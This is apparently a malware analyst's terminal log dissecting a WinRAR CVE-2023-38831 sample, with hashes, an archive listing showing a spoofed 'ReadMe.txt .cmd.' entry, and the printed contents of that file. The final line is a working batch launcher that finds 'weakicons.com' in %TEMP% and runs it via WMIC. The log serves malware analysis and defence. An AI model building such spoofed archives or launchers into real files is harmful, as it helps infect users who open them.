Article with details regarding the vuln and malicious use & file hashes: https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
File: 049af32f678da5e344315ce46787e8fc
Anyrun: https://app.any.run/tasks/3c2f3ff4-3883-4f68-98d1-706138771f46
remnux@remnux:~/Downloads$ md5sum malware.rar
a519226ff8e4edd6d622db45a0099932 malware.rar
remnux@remnux:~/Downloads$ 7z l malware.rar |grep -v ico
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1821500 bytes (1779 KiB)
Listing archive: malware.rar
--
Path = malware.rar
Type = zip
Physical Size = 1821500
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-06-21 14:24:26 ....A 3994 177 ReadMe.txt
2023-06-21 07:26:58 D.... 0 0 ReadMe.txt
2023-07-02 06:53:45 ....A 135 118 ReadMe.txt /ReadMe.txt .cmd.
------------------- ----- ------------ ------------ ------------------------
2023-07-02 06:53:45 2035675 1803266 102 files, 1 folders
remnux@remnux:~/Downloads$ 7z e malware.rar *cmd* -r -ooutput
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1821500 bytes (1779 KiB)
Extracting archive: malware.rar
--
Path = malware.rar
Type = zip
Physical Size = 1821500
Everything is Ok
Size: 135
Compressed: 1821500
remnux@remnux:~/Downloads$ ls output/
'ReadMe.txt .cmd. '
remnux@remnux:~/Downloads$ cat output/ReadMe.txt\ .cmd.\
start "" /min cmd.exe /k "cd %TEMP% && for /F "delims=" %%G in ('dir /b /s "weakicons.com"') do WMIC process call create "%%~G" & exit"